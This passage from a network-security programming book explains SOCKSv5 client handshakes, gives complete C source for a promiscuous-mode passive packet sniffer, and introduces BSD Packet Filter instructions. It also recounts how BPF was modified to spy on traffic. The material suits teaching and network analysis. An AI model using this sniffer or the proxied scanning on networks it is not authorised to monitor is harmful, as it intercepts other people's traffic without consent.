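The corresponding check on the client side can be sketched as follows; socks5_selected_method() is a hypothetical helper name.

```c
/* Hypothetical helper: interprets the 2-byte reply to a SOCKSv5 greeting.
   Returns the method selected by the server (for example, 0x00 for "no
   authentication"), or -1 if the version byte is wrong or the server
   answered 0xFF ("no acceptable methods"). */
int socks5_selected_method(const unsigned char reply[2])
{
    if (reply[0] != 0x05)
        return -1;          /* not a SOCKSv5 server */
    if (reply[1] == 0xFF)
        return -1;          /* none of the offered methods is acceptable */
    return reply[1];
}
```

A careful client also verifies that the returned method is one it actually offered in the greeting.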

During the second stage, the client must tell the SOCKS server the host to which it wants
to connect and the desired connection method. To this end, it sends a packet with the
following contents:
1 byte: the version number
1 byte: a command
1 byte: reserved (always set to 0x00)
1 byte: the type of the address that follows
Variable length: the address of the remote host
2 bytes: the port on the remote host (in network byte order)




The command byte can have one of the following values: 0x01 for CONNECT (a simple
connection), 0x02 for the BIND command, or 0x03 for the UDP ASSOCIATE command (relaying
UDP datagrams, SOCKSv5 only).

The address type byte tells the SOCKS server the format of the address of the remote host;
it can have one of the following values: 0x01 for an IPv4 address specified in 4 bytes in the
network format, 0x03 for a host name (1 length byte followed by the name itself, with no
terminating null; in this case, the SOCKS server must convert the name to the corresponding
IP address, which is not something all SOCKS servers can do), or 0x04 for an IPv6 address
specified in 16 bytes in the network format.
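As an illustration of the host-name address type (0x03), the following sketch builds a complete second-stage CONNECT request that leaves name resolution to the proxy. socks5_build_connect_name() is hypothetical; the port is written byte by byte in network order, which sidesteps any structure padding or alignment concerns.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: builds a SOCKSv5 CONNECT request that passes the
   destination as a host name (address type 0x03).
   Layout: VER CMD RSV ATYP LEN NAME PORT (2 bytes, network order).
   Returns the request length, or -1 on invalid input. */
int socks5_build_connect_name(unsigned char *buf, size_t bufsize,
                              const char *host, unsigned short port)
{
    size_t len = strlen(host);

    if (len == 0 || len > 255 || bufsize < 4 + 1 + len + 2)
        return -1;
    buf[0] = 0x05;                  /* version */
    buf[1] = 0x01;                  /* command: CONNECT */
    buf[2] = 0x00;                  /* reserved */
    buf[3] = 0x03;                  /* address type: host name */
    buf[4] = (unsigned char) len;   /* length byte; no terminating null */
    memcpy(buf + 5, host, len);
    buf[5 + len] = (unsigned char) (port >> 8);    /* port, high byte first */
    buf[6 + len] = (unsigned char) (port & 0xFF);  /* port, low byte */
    return (int) (7 + len);
}
```

For "example.com" and port 80, the request is 18 bytes long: 4 header bytes, the length byte 11, the 11 characters of the name, and the bytes 00 50.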

In reply to this packet, the SOCKS server must send a packet with the same structure but
with different values. If the reply's second byte, which occupies the position of the request's
command byte, is not 0, there was an error establishing the connection, and the client must break
the connection. The type of address and the address itself can also change: the reply carries
the address and port that the server bound for the connection (BND.ADDR and BND.PORT in
RFC 1928), so even if the request named the host, the reply usually contains an IP address.
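Because the length of the reply depends on its address type, a client that wants to consume the whole reply can first read 5 bytes, compute the total length, and then read the rest. The two helpers below are hypothetical sketches of that computation.

```c
/* Hypothetical helper: given at least the first 5 bytes of a SOCKSv5 reply
   (VER REP RSV ATYP and, for host names, the length byte), returns the
   total reply length in bytes, or -1 for an unknown address type. */
int socks5_reply_length(const unsigned char *hdr)
{
    switch (hdr[3]) {                       /* ATYP */
    case 0x01: return 4 + 4 + 2;            /* IPv4 address + port */
    case 0x04: return 4 + 16 + 2;           /* IPv6 address + port */
    case 0x03: return 4 + 1 + hdr[4] + 2;   /* length byte + name + port */
    default:   return -1;
    }
}

/* Returns 1 if the reply reports success (REP == 0x00), 0 otherwise. */
int socks5_reply_ok(const unsigned char *hdr)
{
    return hdr[0] == 0x05 && hdr[1] == 0x00;
}
```

With an IPv4 bound address the reply is 10 bytes, which is exactly the size of the struct req used in the program in this section.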

If the connection was established successfully, the SOCKS server switches into the data 
transfer mode for sending any data to the address specified in the second stage. 

In the program, you must first define the structure of the packet that will be sent in the 
second stage. The following is an example of this definition for an IP host address: 


struct req {
    unsigned char ver;      // SOCKS version number
    unsigned char cmd;      // Command
    unsigned char rsv;      // Reserved
    unsigned char type;     // Address type
    unsigned char addr[4];  // IP address
    unsigned short socport; // Port
};

Next, the following definitions must be included in the program:

char *greeting = "\x05\x01\x00";  // Greeting sent in the first stage (version 5, 1 method: 0x00)
unsigned char greeting_ans[2];    // Buffer to receive the reply to the greeting
struct req temp;

Then a socket is created, a connection with a SOCKS server is established using the
connect() function, and the first-stage operations are carried out: A greeting is sent and the
reply to it is received:

send(sd, (char *) greeting, 3, 0);        // Sending 3 bytes
recv(sd, (char *) greeting_ans, 2, 0);    // Receiving 2 bytes
If there are no errors in the reply, move on to the second stage:


// The server must answer as SOCKSv5 and accept method 0x00 (no authentication)
if ((greeting_ans[0] == 0x05) && (greeting_ans[1] == 0x00))
{
    // Filling the structure's fields
    temp.ver = 0x05;
    temp.cmd = 0x01;
    temp.rsv = 0x00;
    temp.type = 0x01;
    // Assuming the IP address of the host is stored in the sa structure
    // and copying it from there to the temp.addr field
    memcpy(temp.addr, &sa.sin_addr, 4);
    // The port must be specified in the network format.
    temp.socport = htons(80);

    // Sending the packet
    send(sd, (char *) &temp, sizeof(temp), 0);

    // Receiving the reply; it must be in the same structure
    // (this holds when the server replies with an IPv4 address).
    recv(sd, (char *) &temp, sizeof(temp), 0);

    // Checking the reply for any errors: the second byte must be 0
    if ((temp.ver == 0x05) && (temp.cmd == 0x00)) {
        // Transferring control here if the connection was successful;
        // now all data will pass through SOCKS,
        // for example, sending a request.
        sprintf(str1, "GET / HTTP/1.1\r\n");
        sprintf(str2, "Host: www.example.com\r\n\r\n");
        send(sd, str1, strlen(str1), 0);
        send(sd, str2, strlen(str2), 0);
    }
}
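The code above assumes that each recv() call returns exactly the number of bytes requested. On a TCP connection, recv() may legitimately return fewer bytes, so a more robust client loops until the whole reply has arrived. recv_exact() is a hypothetical helper sketching this.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Hypothetical helper: keeps calling recv() until exactly len bytes have
   arrived. Returns len on success, 0 if the peer closed the connection
   first, or -1 on error. */
ssize_t recv_exact(int sd, void *buf, size_t len)
{
    size_t got = 0;

    while (got < len) {
        ssize_t n = recv(sd, (char *) buf + got, len - got, 0);
        if (n == 0)
            return 0;                 /* connection closed prematurely */
        if (n < 0) {
            if (errno == EINTR)
                continue;             /* interrupted by a signal; retry */
            return -1;
        }
        got += (size_t) n;
    }
    return (ssize_t) len;
}
```

With this helper, the 2-byte greeting reply and the 10-byte IPv4 connection reply can each be read with a single call, regardless of how the proxy's data is split across TCP segments.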


The preceding information should make it easy for you to add SOCKS proxy server sup- 
port to the CGI scanner and to any other program. 
A sniffer is a network traffic analyzer. Usually, any network analyzer is called a sniffer, but the
word sniffer is a registered trademark of Network Associates, which markets its network 
analyzers under this name. 

A sniffer may be implemented as a regular software package or as a software-and- 
hardware device for analyzing traffic in a specific network environment. This book considers 
only software sniffers, which can be installed on a regular computer equipped with a network 
card and which intercept Ethernet network traffic. 

Based on the way software sniffers monitor a network, they are divided into two classes: 
passive and active. 

A passive sniffer can only analyze the traffic that passes through the network card of the
computer on which it is installed. An active sniffer can force the necessary traffic from another
network segment to the network card of its computer. This chapter considers both types of 
sniffers. Although not mandatory for understanding the material presented in this chapter, 
Problem 2.2 from my book Puzzles for Hackers provides additional information on the subject. 


9.1. Passive Sniffers 


Listing 9.2 later in this section shows the complete source code for a simple passive sniffer.

It can also be found in the /PART II/Chapter 9 directory on the accompanying CD-ROM.
Because this sniffer analyzes the headers of all layers in a received packet, including the
data link (Ethernet) header, the program needs to create a packet socket (see Section 3.5.3).
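The payload of an Ethernet frame can be no larger than 1,500 bytes, so a corresponding receiving
buffer, named buf[1500], is prepared. (A packet socket also returns the 14-byte Ethernet header,
so the last 14 bytes of a full-size frame do not fit into this buffer; a 1,514-byte buffer avoids
the truncation.)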

By default, a network card receives only packets addressed specifically to it. But a sniffer 
must receive all packets in the network segment for subsequent analysis; therefore,
it must first switch the network card into the promiscuous mode. This will allow it to receive 
all packets, regardless of their destination. The promiscuous mode could be enabled using the 
ifconfig utility (see Section 1.2), but a full-fledged sniffer must be able to switch on the pro- 
miscuous mode programmatically itself. The promiscuous mode is enabled by the portion of 
the code shown in Listing 9.1. 


Listing 9.1. Setting the promiscuous mode 


struct ifreq ifr;
strcpy(ifr.ifr_name, DEVICE);

/* Getting the flag values */
if (ioctl(sd, SIOCGIFFLAGS, &ifr) < 0) {
    perror("ioctl() failed");
    close(sd);
    exit(-1);
}

/* Adding a new flag */
ifr.ifr_flags |= IFF_PROMISC;

/* Setting the interface flags to new values */
if (ioctl(sd, SIOCSIFFLAGS, &ifr) < 0) {
    perror("ioctl() failed");
    close(sd);
    exit(-1);
}
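On Linux, a packet socket can also request promiscuous mode through the PACKET_ADD_MEMBERSHIP socket option with the PACKET_MR_PROMISC type, as described in the packet(7) manual page. Unlike setting IFF_PROMISC with ioctl(), the kernel drops this membership automatically when the socket is closed, so the interface does not stay in promiscuous mode after the sniffer exits. A minimal sketch; promisc_membership() is a hypothetical name, and actually using it requires the privileges needed to open the packet socket in the first place.

```c
#include <string.h>
#include <sys/socket.h>
#include <net/if.h>            /* if_nametoindex() */
#include <netpacket/packet.h>  /* struct packet_mreq, PACKET_MR_PROMISC */

/* Sketch: asks the kernel to keep interface ifname in promiscuous mode for
   as long as the packet socket sd stays open.
   Returns 0 on success, -1 on failure. */
int promisc_membership(int sd, const char *ifname)
{
    struct packet_mreq mr;
    unsigned int idx = if_nametoindex(ifname);

    if (idx == 0)
        return -1;                      /* no such interface */
    memset(&mr, 0, sizeof(mr));
    mr.mr_ifindex = (int) idx;
    mr.mr_type = PACKET_MR_PROMISC;
    return setsockopt(sd, SOL_PACKET, PACKET_ADD_MEMBERSHIP, &mr, sizeof(mr));
}
```

In the sniffer, this call would take the place of the two ioctl() calls, for example promisc_membership(sd, DEVICE).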


Then an endless loop is started, in which a packet is received using the recvfrom()
function, and the PrintHeaders() function is called with a pointer to the received packet.
The PrintHeaders() function parses the packet for individual headers and outputs
the values of the headers' fields to the screen. The sniffer analyzes only the Ethernet,
IP, ARP, TCP, UDP, and ICMP headers. It is possible, however, to add the capability to analyze
other types of headers to the program; you can do this yourself as homework. To gain
access to the necessary headers, the following variables must first be defined (a structure
for the Ethernet header and pointers for all the others):

struct ethhdr eth;
struct iphdr *ip;
struct arphdr *arp;
struct tcphdr *tcp;
struct udphdr *udp;
struct icmphdr *icmp;

All header structure definitions are taken from header files, except the ARP header
structure, which is defined in the program. The reasons why the ARP structure from the header
file cannot be used are explained in Section 3.4.3.
Now the necessary headers can be extracted from the received data. This is done as follows:


/* Extracting the Ethernet header */
memcpy((char *) &eth, data, sizeof(struct ethhdr));

/* Extracting the ARP header */
arp = (struct arphdr *) ((char *) data + sizeof(struct ethhdr));

/* Extracting the IP header */
ip = (struct iphdr *) ((char *) data + sizeof(struct ethhdr));

/* Extracting the TCP header */
tcp = (struct tcphdr *) ((char *) data + sizeof(struct ethhdr) + sizeof(struct iphdr));

/* Extracting the UDP header */
udp = (struct udphdr *) ((char *) data + sizeof(struct ethhdr) + sizeof(struct iphdr));

/* Extracting the ICMP header */
icmp = (struct icmphdr *) ((char *) data + sizeof(struct ethhdr) + sizeof(struct iphdr));
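The pointer arithmetic above assumes that the IP header is exactly sizeof(struct iphdr), that is, 20 bytes. This holds only when the packet carries no IP options; in general, the transport header starts ihl * 4 bytes after the beginning of the IP header. The following sketch computes the offset from the header length field of a raw frame; transport_offset() is a hypothetical helper, and an untagged Ethernet frame (no VLAN tag) is assumed.

```c
#include <stddef.h>
#include <linux/if_ether.h>   /* ETH_HLEN (14) and ETH_P_IP (0x0800) */

/* Sketch: returns the offset of the transport header (TCP, UDP, or ICMP)
   in a raw Ethernet frame, using the IHL field instead of assuming a
   20-byte IP header. Returns 0 if the frame is not IPv4 or is too short. */
size_t transport_offset(const unsigned char *frame, size_t len)
{
    size_t ihl;

    if (len < ETH_HLEN + 20)
        return 0;
    /* The EtherType is stored big-endian at offset 12 */
    if (((frame[12] << 8) | frame[13]) != ETH_P_IP)
        return 0;
    /* Low 4 bits of the first IP byte: same value as ip->ihl, in 32-bit words */
    ihl = (size_t) (frame[ETH_HLEN] & 0x0F) * 4;
    if (ihl < 20 || len < ETH_HLEN + ihl)
        return 0;
    return ETH_HLEN + ihl;
}
```

For a frame whose IP header starts with 0x45 the offset is 34; with 0x46 (4 bytes of options) it is 38.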

Then the fields of all structures can be referenced in the conventional way. For example, 
the TTL field in the IP header is output as follows: 


printf("TTL %d\n", ip->ttl);


In the process, some fields must be converted from the network byte order to the host
byte order using the byte-order conversion functions. I determined the fields that must be
converted experimentally; as a rule, these are all fields longer than 1 byte: 16-bit fields are
converted with ntohs() and 32-bit fields with ntohl().
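For example, the 32-bit TCP sequence number must be converted with ntohl(); ntohs() would convert only 16 bits of it. A minimal sketch that reads the field directly from a raw TCP header (tcp_seq() is a hypothetical helper):

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>   /* ntohl() */

/* Sketch: reads the 32-bit sequence number of a TCP header (bytes 4..7)
   and converts it from network to host byte order. */
uint32_t tcp_seq(const unsigned char *tcp)
{
    uint32_t raw;

    memcpy(&raw, tcp + 4, sizeof(raw));   /* avoids an unaligned access */
    return ntohl(raw);
}
```

The same applies to the acknowledgment number (bytes 8..11 of the TCP header).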

Naturally, a packet cannot contain both IP and ARP headers, or both TCP and UDP headers.
Consequently, the sniffer must determine which headers the packet contains; that is,
it must determine the type of the received packet. The first step in solving this task is to
analyze the Packet type field in the Ethernet header:

/* Is it ARP or RARP? */
if ((ntohs(eth.h_proto) == ETH_P_ARP) ||
    (ntohs(eth.h_proto) == ETH_P_RARP)) { ...

/* Is it IP? */
if (ntohs(eth.h_proto) == ETH_P_IP) { ...


If the received packet is an IP packet, the second step is to analyze the Protocol field of the
IP header to determine the next (transport layer) header:

/* Is it TCP? */
if (ip->protocol == IPPROTO_TCP) { ...

/* Is it UDP? */
if (ip->protocol == IPPROTO_UDP) { ...

/* Is it ICMP? */
if (ip->protocol == IPPROTO_ICMP) { ...
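The same two-step decision can also be made directly on the raw bytes of the frame, which is what the BPF filter in Listing 9.3 does: the EtherType sits at offset 12 and the IP Protocol field at offset 14 + 9 = 23. A sketch, assuming an untagged Ethernet frame; both function names are hypothetical.

```c
#include <stddef.h>
#include <netinet/in.h>   /* IPPROTO_ICMP, IPPROTO_TCP, IPPROTO_UDP */

/* Returns the IPv4 Protocol field of a raw Ethernet frame, or -1 if the
   frame is too short or its EtherType is not IPv4 (0x0800). */
int frame_ip_protocol(const unsigned char *frame, size_t len)
{
    if (len < 34)                             /* Ethernet (14) + minimal IP (20) */
        return -1;
    if (frame[12] != 0x08 || frame[13] != 0x00)
        return -1;                            /* not an IP packet */
    return frame[23];                         /* offset 14 + 9 */
}

/* Returns 1 for the transport protocols whose headers the sniffer decodes. */
int is_decoded_protocol(int proto)
{
    return proto == IPPROTO_TCP || proto == IPPROTO_UDP || proto == IPPROTO_ICMP;
}
```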


The Dump(buf, n) function is executed if the -d parameter is specified in the command
line. It outputs the received data as a hex and ASCII dump.





Listing 9.2. A passive sniffer (sklsniff.c) 





#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>        /* inet_ntoa(); included before the <linux/...> headers */
#include <features.h>         /* For the glibc version number */
#if __GLIBC__ >= 2 && __GLIBC_MINOR__ >= 1
#include <netpacket/packet.h>
#include <net/ethernet.h>     /* L2 protocols */
#else
#include <asm/types.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>   /* L2 protocols */
#endif
#include <sys/ioctl.h>
#include <linux/if.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/icmp.h>

#define DEVICE "eth0"
#define IP_DF 0x4000
#define IP_MF 0x2000

struct arphdr
{
    unsigned short ar_hrd;            /* Format of the hardware address */
    unsigned short ar_pro;            /* Format of the protocol address */
    unsigned char  ar_hln;            /* Length of the hardware address */
    unsigned char  ar_pln;            /* Length of the protocol address */
    unsigned short ar_op;             /* ARP opcode (command) */
    unsigned char  ar_sha[ETH_ALEN];  /* Sender hardware address */
    unsigned char  ar_sip[4];         /* Sender IP address */
    unsigned char  ar_tha[ETH_ALEN];  /* Target hardware address */
    unsigned char  ar_tip[4];         /* Target IP address */
};

/* ---------------------------------------------------------------- */

/* A function to output the header fields of the received packet    */
/* ---------------------------------------------------------------- */
void PrintHeaders(void *data)
{
    struct ethhdr eth;
    struct iphdr *ip;
    struct arphdr *arp;
    struct tcphdr *tcp;
    struct udphdr *udp;
    struct icmphdr *icmp;
    struct in_addr addr;

    memcpy((char *) &eth, data, sizeof(struct ethhdr));
    printf("==ETHERNET HEADER=================================\n");
    printf("MAC destination            ");
    printf(":%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
           eth.h_dest[0], eth.h_dest[1], eth.h_dest[2],
           eth.h_dest[3], eth.h_dest[4], eth.h_dest[5]);
    printf("MAC source                 ");
    printf(":%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
           eth.h_source[0], eth.h_source[1], eth.h_source[2],
           eth.h_source[3], eth.h_source[4], eth.h_source[5]);
    printf("Packet type ID field       :%#x\n", ntohs(eth.h_proto));

    if ((ntohs(eth.h_proto) == ETH_P_ARP) ||
        (ntohs(eth.h_proto) == ETH_P_RARP)) {
        arp = (struct arphdr *) ((char *) data + sizeof(struct ethhdr));
        printf("Format of hardware address :%d\n", ntohs(arp->ar_hrd));
        printf("Format of protocol address :%#x\n", ntohs(arp->ar_pro));
        printf("Length MAC                 :%d\n", arp->ar_hln);
        printf("Length IP                  :%d\n", arp->ar_pln);
        printf("ARP opcode                 :%d\n", ntohs(arp->ar_op));
        printf("Sender hardware address    :%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
               arp->ar_sha[0], arp->ar_sha[1], arp->ar_sha[2],
               arp->ar_sha[3], arp->ar_sha[4], arp->ar_sha[5]);
        printf("Sender IP address          :%d.%d.%d.%d\n",
               arp->ar_sip[0], arp->ar_sip[1], arp->ar_sip[2], arp->ar_sip[3]);
        printf("Target hardware address    :%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
               arp->ar_tha[0], arp->ar_tha[1], arp->ar_tha[2],
               arp->ar_tha[3], arp->ar_tha[4], arp->ar_tha[5]);
        printf("Target IP address          :%d.%d.%d.%d\n",
               arp->ar_tip[0], arp->ar_tip[1], arp->ar_tip[2], arp->ar_tip[3]);
        printf("##################################################\n");
    }

    if (ntohs(eth.h_proto) == ETH_P_IP) {
        ip = (struct iphdr *) ((char *) data + sizeof(struct ethhdr));
        printf("==IP HEADER=======================================\n");
        printf("IP version       :%d\n", ip->version);
        printf("IP header length :%d\n", ip->ihl);
        printf("TOS              :%d\n", ip->tos);
        printf("Total length     :%d\n", ntohs(ip->tot_len));
        printf("ID               :%d\n", ntohs(ip->id));
        printf("Fragment offset  :%#x\n", ntohs(ip->frag_off) & 0x1FFF);
        printf("MF               :%d\n", ntohs(ip->frag_off) & IP_MF ? 1 : 0);
        printf("DF               :%d\n", ntohs(ip->frag_off) & IP_DF ? 1 : 0);
        printf("TTL              :%d\n", ip->ttl);
        printf("Protocol         :%d\n", ip->protocol);
        addr.s_addr = ip->saddr;
        printf("IP source        :%s\n", inet_ntoa(addr));
        addr.s_addr = ip->daddr;
        printf("IP destination   :%s\n", inet_ntoa(addr));

        if (ip->protocol == IPPROTO_TCP) {
            tcp = (struct tcphdr *) ((char *) data + sizeof(struct ethhdr) + sizeof(struct iphdr));
            printf("==TCP HEADER======================================\n");
            printf("Port source      :%d\n", ntohs(tcp->source));
            printf("Port destination :%d\n", ntohs(tcp->dest));
            printf("Sequence number  :%u\n", ntohl(tcp->seq));
            printf("Ack number       :%u\n", ntohl(tcp->ack_seq));
            printf("Data offset      :%d\n", tcp->doff);
            printf("FIN:%d,", tcp->fin);
            printf("SYN:%d,", tcp->syn);
            printf("RST:%d,", tcp->rst);
            printf("PSH:%d,", tcp->psh);
            printf("ACK:%d,", tcp->ack);
            printf("URG:%d,", tcp->urg);
            printf("ECE:%d,", tcp->ece);
            printf("CWR:%d\n", tcp->cwr);
            printf("Window           :%d\n", ntohs(tcp->window));
            printf("Urgent pointer   :%d\n", ntohs(tcp->urg_ptr));
        }

        if (ip->protocol == IPPROTO_UDP) {
            udp = (struct udphdr *) ((char *) data + sizeof(struct ethhdr) + sizeof(struct iphdr));
            printf("==UDP HEADER======================================\n");
            printf("Port source      :%d\n", ntohs(udp->source));
            printf("Port destination :%d\n", ntohs(udp->dest));
            printf("Length           :%d\n", ntohs(udp->len));
        }

        if (ip->protocol == IPPROTO_ICMP) {
            icmp = (struct icmphdr *) ((char *) data + sizeof(struct ethhdr) + sizeof(struct iphdr));
            printf("==ICMP HEADER=====================================\n");
            printf("Type             :%d\n", icmp->type);
            printf("Code             :%d\n", icmp->code);
        }

        printf("##################################################\n");
    }
}


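void Dump(void *data, int len)
{
    unsigned char *buf = data;
    int i;
    int poz = 0;
    char str[17];

    memset(str, 0, 17);
    for (i = 0; i < len; i++)
    {
        /* Every 16 bytes: print the ASCII column and start a new line with the offset */
        if (poz % 16 == 0)
        {
            printf(" %s\n%04x: ", str, poz);
            memset(str, 0, 17);
        }

        /* Nonprintable characters are shown as dots in the ASCII column */
        if (buf[poz] < ' ' || buf[poz] >= 127)
            str[poz % 16] = '.';
        else
            str[poz % 16] = buf[poz];

        printf("%02X ", buf[poz++]);
    }
    /* Pad the last line so that its ASCII column lines up with the others */
    printf("%*s %s\n\n", (16 - len % 16) % 16 * 3, "", str);
}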


/* ---------------------------------------------------------------- */
/* The main() function                                               */
/* ---------------------------------------------------------------- */
int main(int argc, char *argv[])
{
    int sd;
    int n = 0;
    int packet = 0;
    struct ifreq ifr;
    char buf[1500];

    fprintf(stderr, "==================================================\n");
    fprintf(stderr, "= Simple passive sniffer by Ivan Sklyaroff, 2006 =\n");
    fprintf(stderr, "= [-d] - dump a block of data in hex and ASCII   =\n");
    fprintf(stderr, "==================================================\n");

    if ((sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    /* Switching the interface into the promiscuous mode */
    strcpy(ifr.ifr_name, DEVICE);
    if (ioctl(sd, SIOCGIFFLAGS, &ifr) < 0) {
        perror("ioctl() failed");
        close(sd);
        exit(-1);
    }
    ifr.ifr_flags |= IFF_PROMISC;

    if (ioctl(sd, SIOCSIFFLAGS, &ifr) < 0) {
        perror("ioctl() failed");
        close(sd);
        exit(-1);
    }

    /* Receiving packets in an endless loop */
    while (1)
    {
        n = recvfrom(sd, buf, sizeof(buf), 0, 0, 0);
        printf("##################################################\n");
        printf("Packet #%d (%d bytes read)\n", ++packet, n);

        /* Outputting the header fields of the received packets */
        PrintHeaders(buf);

        /* If the -d parameter was specified in the command line, show the
           received data as a hex and ASCII dump */
        if (argc == 2) {
            if (!strcmp(argv[1], "-d"))
                Dump(buf, n);
        }

        printf("\n");
    }

    return 0;
}





9.1.1. A Passive Sniffer Using a BSD Packet Filter 


The passive sniffer considered in the preceding example analyzes all the traffic passing through 
the network card of the computer, on which it is installed. In practice, however, there is usu- 
ally no need to analyze all packets indiscriminately; only some of them, for example, packets 
exchanged between specific hosts, must be analyzed. To this end, network packets have to be 
filtered by the source and destination IP addresses and by other parameters. The first way of 
handling this task is to use the conditional if statement in the program. This method was par- 
tially employed in the previous example to analyze whether the network packet headers per- 
tained to a specific protocol. This method, however, has some shortcomings. For one thing, 
it is too cumbersome to be used for a full-scale filter with comprehensive capabilities. Its main 
shortcoming, however, is that filtering takes place at the application level. Copying data from
the kernel space to the user space is expensive; on high-speed links, the analyzer
may not be able to process all data received from the network, and some packets may be lost.
The second method is to use the BSD Packet Filter (BPF). BPF is a register-based filtration
mechanism that applies a filter program to each received packet. It was developed by Steve
McCanne and Van Jacobson and is used on practically all UNIX systems. The filtration proc- 
ess takes place inside the kernel at the data link layer and is independent of network protocols. 
Consequently, irrelevant packets are discarded at the network driver level, before the received 
data are passed to the application. 

An interesting tidbit concerning BPF: It was used by the famous hacker Kevin Mitnick. 
Here is an excerpt from one media article (“Hi, I’m a Hacker”, by Alexander Zapolskis) on the
subject: 

BPF (which played far from the last role in this detective story) is the basis of the spy software 
developed by Shimomura. In “Takedown,” he describes how he modified the existing version of 
BPF to run on any computer without its owner's knowledge. The modified program intercepts 
incoming and outgoing Internet traffic and sends this information to the person who infiltrated it. 
It’s obvious that this is an ideal spy gadget, which can be used to obtain both civilian and military 
strategic information. It just so happened that Mitnick also used BPF to ransack Shimomura’s
computer. Thus, the great manhunt for the hacker of the century was precipitated not so much by 
his being dangerous or difficult to catch, but because he willingly or unwillingly intruded into too 
big of a game played by the military and intelligence. 

Thus, by learning BPF you can touch the sublime! 


9.1.1.1. The BPF Pseudo Assembler Language 


Linux has its own filter called Linux Socket Filter (LSF), but it is the same BPF and uses the 
same instructions. All LSF structures are defined in the /linux/filter.h header file. Nevertheless, 
for the improved sniffer I use the classical BPF, whose structures are defined in the /net/bpf.h 
header file. The structure names used in these two files are different. 

The filtering program is written in a special pseudo-processor machine language. This 
language has instructions for loading and storing operands, for arithmetic and logic opera- 
tions, and for conditional and unconditional jumps. For working with operands, the pseudo 
processor provides an accumulator register (or simply an accumulator), an index register, 
memory cells, and an internal program counter. 

Just as no one nowadays writes low-level programs in machine code for a regular processor,
using the more human-friendly assembler instead, the BPF pseudo processor has its own
pseudo assembler, in which each machine code has a corresponding mnemonic. (All definitions
of the mnemonics are given in the header file.) So the BPF program for the improved sniffer is
also written in the pseudo assembler and not in machine code.

Unfortunately, Linux has no man page for either BPF or LSF. Therefore, most of the following
information was taken from the BSD bpf(4) man page.

The filtration program is an array of instructions. The format of each instruction is de- 
fined by the following instruction data structure: 

struct bpf_insn {
    u_short   code;  /* Actual filter code */
    u_char    jt;    /* Jump if TRUE */
    u_char    jf;    /* Jump if FALSE */
    bpf_int32 k;     /* Common use field */
};

The code field contains the instruction code, the jt and jf fields modify the instruction 
execution order in the filtration program, and the k field holds the value of the instruction 
operand. 

Altogether, there are eight instruction classes: BPF_LD, BPF_LDX, BPF_ST, BPF_STX,
BPF_ALU, BPF_JMP, BPF_RET, and BPF_MISC. The description of each class follows.

The /net/bpf.h header file contains macro definitions, which make the task of developing
a filtration program easier:

#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }

#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }

BPF_LD 

The BPF_LD instruction loads values into the accumulator. The values can be of one of the
following types:

- A constant (BPF_IMM)
- Packet data located at a fixed offset (BPF_ABS)
- Packet data located at a variable offset (BPF_IND)
- The packet length (BPF_LEN)
- A memory value (BPF_MEM)


The size of loaded BPF_IND and BPF_ABS values must be specified as word (BPF_W),
halfword (BPF_H), or byte (BPF_B). In BPF, a word is always 4 bytes, regardless of the processor.

The following three examples show how to load 4 bytes, 2 bytes, and 1 byte of packet data
into the accumulator. The offset in the packet is specified by the k constant.

BPF_LD + BPF_W + BPF_ABS     A <- P[k:4]
BPF_LD + BPF_H + BPF_ABS     A <- P[k:2]
BPF_LD + BPF_B + BPF_ABS     A <- P[k:1]

The following three examples show how to load 4 bytes, 2 bytes, and 1 byte of packet data
into the accumulator when the offset in the data block is specified by the sum of X and the
k constant, where X is the value in the index register.

BPF_LD + BPF_W + BPF_IND     A <- P[X + k:4]
BPF_LD + BPF_H + BPF_IND     A <- P[X + k:2]
BPF_LD + BPF_B + BPF_IND     A <- P[X + k:1]

The packet length is loaded into the accumulator:

BPF_LD + BPF_W + BPF_LEN     A <- len

The k constant is loaded into the accumulator:

BPF_LD + BPF_IMM             A <- k

The memory value stored at address k is loaded into the accumulator:

BPF_LD + BPF_MEM             A <- M[k]
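In the P[k:n] notation, n bytes starting at offset k are read in network (big-endian) byte order, so the value that ends up in the accumulator is the same on any host. The following sketch emulates BPF_LD + BPF_W/BPF_H/BPF_B + BPF_ABS in user space; bpf_load_abs() is a hypothetical helper, not a kernel or library function.

```c
#include <stddef.h>
#include <stdint.h>

/* Sketch of what BPF_LD + BPF_{W,H,B} + BPF_ABS computes: size bytes at
   offset k, most significant byte first. Returns 0 and stores the value
   in *a, or -1 if the load would run past the end of the packet (the
   kernel's interpreter rejects the packet in that case). */
int bpf_load_abs(const unsigned char *p, size_t len, uint32_t k,
                 size_t size, uint32_t *a)
{
    size_t i;
    uint32_t v = 0;

    if (size != 1 && size != 2 && size != 4)
        return -1;
    if (k > len || size > len - k)
        return -1;
    for (i = 0; i < size; i++)
        v = (v << 8) | p[k + i];   /* network byte order */
    *a = v;
    return 0;
}
```

For the bytes c0 a8 0a 82 (the address 192.168.10.130), a word load at offset 0 yields 0xc0a80a82 on both little-endian and big-endian hosts.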
BPF_LDX

The BPF_LDX instruction loads values into the index register. The value can be of one of
the following types:

- A constant (BPF_IMM)
- The packet length (BPF_LEN)
- A memory value (BPF_MEM)
- The length of the packet's IP header (BPF_MSH)

The following are a few examples of using this instruction.

A word-size value k is loaded into the index register:

BPF_LDX + BPF_W + BPF_IMM    X <- k

The memory value stored at address k is loaded into the index register:

BPF_LDX + BPF_W + BPF_MEM    X <- M[k]

The packet length is loaded into the index register:

BPF_LDX + BPF_W + BPF_LEN    X <- len

The length of the packet's IP header is loaded into the index register (k is the offset of the
IP header in the packet; the low 4 bits of that byte give the header length in 32-bit words):

BPF_LDX + BPF_B + BPF_MSH    X <- 4*(P[k:1]&0xf)

BPF_ST

The BPF_ST instruction stores the value in the accumulator in memory:

BPF_ST     M[k] <- A

The address of the memory cell is specified by the k value.

BPF_STX

